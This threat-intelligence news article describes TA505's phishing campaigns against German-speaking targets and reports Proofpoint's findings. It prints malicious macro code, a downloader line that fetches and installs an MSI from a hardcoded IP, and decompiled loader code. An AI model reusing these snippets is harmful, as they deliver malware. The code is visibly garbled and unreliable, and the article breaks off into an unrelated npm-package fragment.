TA505 campaigns have returned to distributing tens to hundreds of thousands malicious emails targetting German-speaking countries, now uses additional loaders to deliver the FlawedGrace RAT...

Continue reading
TA505, the financially motivated threat group, has **resurfaced**, attackers are known for distributing malicious emails to industries mainly located in Germany and Austria.
Their new tools include a KiXtart Loader, MirrorBlast loader, updated FlawedGrace variant, and updated malicious Excel attachments.

Source: Proofpoint

Their messages per wave were relatively low in September compared to its typical activity, and they delivered only several thousand emails per wave, attached with malicious Excel attachments. However, in October, they increased their number by tens of hundreds of thousands. Typical lures included legal, media release, situation report, and health claims.

Email for insurance claim
Every email contains a malicious Excel attachment; when opened with macros enabled, it would download and run an MSI file. The MSI file would execute the Rebol Loader (MirrorBlast)

Insurance claim Excel attachment
Tactics and procedures used by the group have a lot of resemblance to their 2019 and 2020 campaigns; the emails shifted from detailed lures to more generic titles such as “SecureFile” or “Secure Document.” Their subjects took advantage of DocuSign, insurance, invoices, Microsoft and included Covid-19 contents.

German-language using an email lure
The email contained the following items:

If macros are enabled, the Excel file would download and run an MSI file; this file executes an additional intermediary KiXtart loader. The KiXtart loader communicates with the C&C server to receive commands for a second MSI file that executes MirrorBlast.
Code responsible for downloading the MSI file is lightly obfuscated with filler characters and simple hidden functions in Title, cell, or comments.
Function Auto Open()
Dim a As New ScriptControl
a. Language = ActiveWorkbook.BuiltinDocument Properties ("Subject").Value
a.AddCode (ActiveWorkbook.BuiltinDocument Properties ("Comments").Value)
End FunctionDeobfuscated downloader that pulls the next stage of MSI file:-
with (new ActiveXObject ("WindowsInstaller. Installer")) {
UILevel=2;
InstallProduct ("http://172.105.178.119/install.msi")
}The additional intermediary loaders are coded in languages Rebol and KiXtart, and they are responsible for delivering the secondary payloads

int_stdcall detonate (int al, int a2, int a3) {
// snip
v4 = 0;
payload_va = find_base_address(); // base address of the shellcode
if (payload_va) {
v8 = (byte *) (payload_va + get_0x50000); // add 0x5000, to get to the next stage BOF
if (v8){
v1l = 0;
dllEntryPoint = (int (_stdcall *) (int, int, int)) expand_exe_in_memory( (int) v8, &v11);
if (D11EntryPoint) {
v12 = *(_DWORD *) (v11 + * (_DWORD *) (v11 + 0x3C) + 0x3C) == 0x1000;
if ( v12 )
v6 = payload_va;
else
v6 = v11;
if (v12) {
v9 *(_DWORD *) (v11 + * (_DWORD *) (v11 + 0x3C) + 0x54);
v7 = (byte *) ZwAllocateVirtualMemory(-1, 0, v9, 0x3000, 4);
if (v7)
memcpy (v7, (byte *)vil, v9);
memcpy((byte *)v11, v8, V9);
*(_DWORD *) (v11 + 0x30) v7;
*(_WORD *) v11 TOM'; // set the MZ header to Mo (Module?)
>
)
v4 = DllEntryPoint (v6, DLL_PROCESS_ATTACH, a3); // detonate next stage
}
}
}
return v4;
}_"TA505 is an established threat actor that is financially motivated and known for conducting malicious email campaigns on a previously unprecedented scale. Using intermediate loaders in its attack chain is also likely to become a longer-term technique employed by the threat actor",_ said Proofpoint.

148 malicious npm packages masquerading as student proxy and school Wi-Fi bypass tools. Rather than compromising developers during installation